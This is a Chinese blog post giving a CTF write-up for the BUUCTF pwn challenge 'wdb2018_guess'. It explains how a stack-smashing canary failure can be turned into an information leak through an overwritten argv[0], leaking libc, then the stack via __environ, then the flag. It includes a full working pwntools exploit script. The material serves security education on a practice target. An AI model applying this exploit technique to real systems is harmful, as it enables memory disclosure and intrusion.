wdb2018_guess

最新推荐文章于 2024-03-30 23:08:20 发布
最新推荐文章于 2024-03-30 23:08:20 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122580202
版权

wdb2018_guess

查看保护
请添加图片描述
请添加图片描述
这里开了canary,溢出时会报错
请添加图片描述
可以看到报错后面会输出程序名字,既然flag被放到了栈上是不是也可以被输出。
environ是libc中存储栈地址的一个变量,可以通过environ算出与flag的偏移,再将flag通过canary来输出。
想要知道environ的地址还需要知道libc的地址,libc的地址可以通过got来算。
那么第一步就是需要算出argv[0]与gets这个地方ebp-0x40的偏移。
请添加图片描述
argv[0]的地址为0x7fffffffdeb8,在gets那里下个断点
请添加图片描述
r一下运行到gets那里,此时rbp-0x40的地址即可看到
请添加图片描述
rbp-0x40的地址为0x7fffffffdd90
0x7fffffffdeb8 - 0x7fffffffdd90 = 0x128
此时构造payload,b'a' * 0x128 + p64(puts_got)即可。拿到libc_base之后算出environ的地址。再改一下之前的payload使其输出environ在栈上的地址,b'a' * 0x128 + p64(environ_add)
现在还差flag和environ的偏移,flag的地址和上面gets那里一样算出来之后就可以得到flag和environ的偏移为0x168
exp:

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29529) 
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

puts_got = elf.got['puts']

p1 = b'a' * 0x128 + p64(puts_got)
r.sendlineafter('Please type your guessing flag', p1)

puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('puts_addr = ' + hex(puts_addr))

libc = ELF('libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']
environ_addr = libc_base + libc.sym['__environ']
success('evnviron_addr = ' + hex(environ_addr))

p2 = b'a' * 0x128 + p64(environ_addr)
r.sendlineafter('Please type your guessing flag', p2)

stack_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('stack_addr = ' + hex(stack_addr))

flag_addr = stack_addr - 0x168

p3 = b'a' * 0x128 + p64(flag_addr)
r.sendlineafter('Please type your guessing flag', p3)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
wdb_scraper
03-22
【标题】"wdb_scraper" 是一个针对Tutti.ch网站的数据抓取工具,它设计用于从该网站上高效地收集和整理信息。Tutti.ch是一个瑞士的在线市场,用户可以在这里查找各种服务、商品和活动。wdb_scraper帮助数据分析师、...
wdb_graphql
03-15
迷你挑战3-WDB @ FHNE BSc数据科学 作者:卢卡斯·雷伯(Lukas Reber) 使用Django和Graphene构建的GraphQL API。 Selenium Web Scraping脚本(在找到)使用该API来存储和更新数据库的数据。 由于这只是概念的...
wdb2018_guess fork()和wait()的问题
carol2358的博客
09-02 375
这个问题困扰了我,程序动脑不如动手,就写了一个程序来判断,问题的来源是wdb2018_guess 这道题 他fork()了三次,却只有3次gets(),我想着明明有4个进程,为什么只gets了3次 #include<stdio.h> #include <sys/types.h> #include <unistd.h> #include<sys/wait.h> int main() { int stat_loc; int i=0; int n=3; in
BUUCYF之“wdb2018_guess
Probeginner的博客
12-18 307
stack smash的使用
wdb2018_guess与stack smash
Tw0的博客
02-14 168
巩固一下stack smash技术,了解elf程序的运行环境参数。
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 413
stack smash
[BUUCTF]PWN——wdb2018_guess(stack smashing--canary报错利用)
mcmuyanga的博客
03-14 1174
wdb2018_guess 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况 64位ida载入 存在溢出利用点,但是有canary保护,这边39行和41行的puts函数是写死的,没法用来接收泄露的信息,想到了利用canary的报错输出 在程序加了 carry 保护后,如果我们的输入覆盖了 carry ,程序就会报错,报错代码如下,可以看到,程序会执行 __stack_chk_fail 函数来打印 __libc_argv[0] 指针所指向的字符串(默认存储的是程序的名称)
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
WDB,全称为Wind River Debug Bridge,是VxWorks系统一个重要的组件,它提供了强大的远程调试功能,允许开发者在主机上对目标系统的VxWorks应用进行调试。 VxWorks WDB组件的核心功能包括: 1. **远程调试**:...
WDB-crx插件
04-01
**WDB-crx插件详解** 在Web开发领域,提高工作效率和获取及时的学习资源是至关重要的。"WDB-crx插件"就是这样一个工具,它为开发者提供了强大的功能,帮助他们更好地管理和利用网络上的编程博客资源。这款插件是专...
Leader统帅KFR-72LW_02WDB81TU1空调说明书.pdf
02-13
Leader统帅品牌说明书
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1331
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
wdb2018 guessenviron的利用
最新发布
qq_60209620的博客
03-30 303
通过libc找到environ地址后,泄露environ地址处的值,可以得到环境变量地址,环境变量保存在,通过偏移可以得到上任意变量地址。这个函数会打印__libc_argv[0],其实就是文件路径,我们只用找到__libc_argv[0]在哪,看文件地址。所以偏移值:0x7ffd2d95e6c8 - 0x7ffd2d95e560 = 0x168。
wdb2018_guess-___stack_chk_fail泄露信息
qq_40712959的博客
11-03 377
背景知识 在程序添加了canary保护后,如果我们读取的bof覆盖了对应的值时,程序就会报错,我们可以利用报错信息。 程序在启动canary保护之后,如果发现canary被修改的话,程序就会执行__stack_chk_fail函数来打印argv[0]指针所指向的字符串,正常情况下,这个指针指向程序名。很简单,只要我们可以控制argv[0],就能知道我们想知道的信息。 void __attribute__ ((noreturn)) __stack_chk_fail (void) { __forti
[BUUTF]-PWN:wdb2018_guess解析(修改argv0)
2301_79326813的博客
02-09 328
查看保护查看ida这道题并不复杂,只是要注意一点细节。
网鼎杯2018 guess(stack smashing)
seaaseesa的博客
04-30 923
wdb2018_guess stack smashing 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Flag读取并存储里 Fork三次子进程,然后有gets函数,导致溢出,但是有canary保护。 由于使用了gets,因此可以无限制溢出,并且有三次机会。那么,我们可以利用stack smashing报错,来输出信息。第一次,我们泄露函数的got表内容,为...
攻防世界PWN之interpreter-200题解
seaaseesa的博客
02-06 585
interpreter-200 这是一个befunge程序解释器,befunge程序的语法参考https://www.jianshu.com/p/ed929cf72312,还有官方的文档在https://esolangs.org/wiki/Befunge 另外本文参考国外的一篇,加以自己的理解,做了简化 https://uaf.io/exploitation/2016/09/05/Tokyo...
_environ与ssp攻击
N1rvana的博客
02-21 1123
_environ 在Linux Cenviron一个全局变量,它储存着系统的环境变量。 它储存在libc 因此environ是沟通libc地址地址的桥梁。 如图:即为一个程序environ的具体信息: environ利用 通过libc找到environ地址后,泄露environ地址处的值,可以得到环境变量地址,环境变量保存在,通过偏移可以得到上任意变量地址。 ssp攻击 canary的各种利用方式,有一种是通过 __stack_chk_fail函数打印报错信息来实现。 __stac
buuctf (网鼎杯)wdb_2018_3rd_pesp realloc_hook, unlink,写入bss段3种方法记录
carol2358的博客
05-14 1267
写了一道2018网鼎的heap,漏洞挺多,尝试了3方法解题,也算是对目前heap的学习进度的总结吧 题目本身是一道常规heap题,pie和got保护都没开,可以改写got表 ①realloc_hook的做法: 先贴exp,然后慢慢解释 exp: from pwn import * from LibcSearcher import * local_file = './wdb_2018_3rd_pesp' local_libc = '/lib/x86_64-linux-gnu/libc-2.23
【八芒星计划】绕过canary
carol2358的博客
09-02 665
文章目录wdb2018_guess wdb2018_guess 有趣的题目,本题fork了三次,那么就会gets三次 利用三次gets和canary,我们可利用stack smash来获得三次信息 第一次获得libc,第二次获得地址,第三次获得flag 覆盖argv[0],也就是程序名所在的位置 先用puts的got来获得libcbase,用libcbase获得environ地址,也就是stack_end,位置是utf8的位置 然后第二次输入通过environ来获得stack的地址 第三次就可以
怎么把vivao2018.2波形生成的WDB文件导出来
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值